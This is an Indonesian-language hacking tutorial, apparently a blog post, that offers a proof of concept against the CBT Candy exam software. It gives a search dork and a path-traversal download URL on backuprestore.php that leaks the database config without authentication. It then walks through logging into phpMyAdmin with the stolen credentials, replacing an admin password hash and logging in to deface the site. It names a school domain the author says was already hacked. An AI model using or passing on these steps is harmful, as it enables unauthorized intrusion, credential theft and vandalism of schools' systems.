Heyoo kimax, kali ini w bakal share PoC baru yang gua temuin kemaren :v. Jadi kemaren gua habis liat liat source code CBT Candy, eh ternyata nemu sesuatu wkwk. Langsung eksekusi, dan ternyata berhasil :v
Oke jadi bug nya itu ada di backuprestore.php, dimana bug ini kita itu bisa download file apa saja yang ada di web tanpa ada autentikasi terlebih dahulu. Jadi kita bisa dwnload download file yang ada di server sesuka hati :)
Lah bang kan cuma download download doang, hek nya gimana? Tenang ges mending kalian simak ae dah sampe bawah. Nanti kalian tau cara hek nya gimana :v
Okelah gas ke tutor
# Bahan Bahan
1. Hp / Pc
2. Sabar
# Dork
1. "CBT Candy v2.8.0 r3"
# Exploit
1. /admin/backuprestore.php?nama_file=../config/config.database.php
# Tutor
1. Dorking Seperti Biasa, Lalu pilih salah satu web.
(Udah gua heked, tapi gpp masih bisa :v)
2. Masukin Exploit di atas.
Misal punya gua : cbt.sdnkepatihan.com/login.php
Masukin Exploit jadi : http://cbt.sdnkepatihan.com/admin/backuprestore.php?nama_file=../config/config.database.php
Nah setelah masukin Exploit. Secara otomatis akan ada file ke download kaya foto di bawah ini.
Nah itukan ada file ke download. Selanjut nya kalian buka file nya pake Teks Editor kalian aja.Isi nya nanti kurang lebih kaya gini.
Nah disitu kalian lihat config buat sambung ke database.
4. Login ke phpmyadmin, lalu rubah sandi
Oke cara akses phpmyadmin?
site.com/phpmyadmin
Nah kalo udah nanti kalian harus masukin username sama pasword, kalian samain aja kaya username dan password di file config tadi :)
Nah setelah login kalian akan masuk ke phpmyadmin.
Nah di phpmyadmin kalian klik aja tanda panah di pojok kiri atas, nanti tampilan kaya di atas.
Setelah itu kalian klik DB nya terus pilih table pengawas.
Nah setelah kalian pilih table pengawas, stelah itu klik tanda panah lagi di pojok kanan atas. Nanti tampilan kaya di bawah.
Nah disitu kalian cari aja yang level nya admin, biasanya yang di encrypt password nya. Setelah itu kalian edit column nya.
Nah tinggal klik edit aja, terus di bagian password kaliam ganti pass nya
Note* : pass juga harus encrypt
Gimana cara encrypt nya bang?
Nah disitu kalian atur 12 ke 10 dulu lalu masukin pass kalian sendiri
Nah setelah itu klik hash aja lalu kalian copy tulisan hijau yang keluar di atas.
5. Kalau sudah kita kembali ke phpmyadmin lalu edit pass nya sesuai yang sudah kalian encrypt tadi
Nah oke setelah itu kalian balik lagi ke web Candy CBT nya, terus login di panel admin
Di gua : cbt.sdnkepatihan.com/admin/login.php
Username sesuaikan dengan username admin yang kalian edit tadi. Password sesuai dengan yang sudah kalian encrypt tadi.
Nah kalo sudah gitu tinggal login ae.
Nah done, disitu gua upshell forbiden jadi ganti title ae :v
Nah sekian tutor dari kami, terima kasih :)
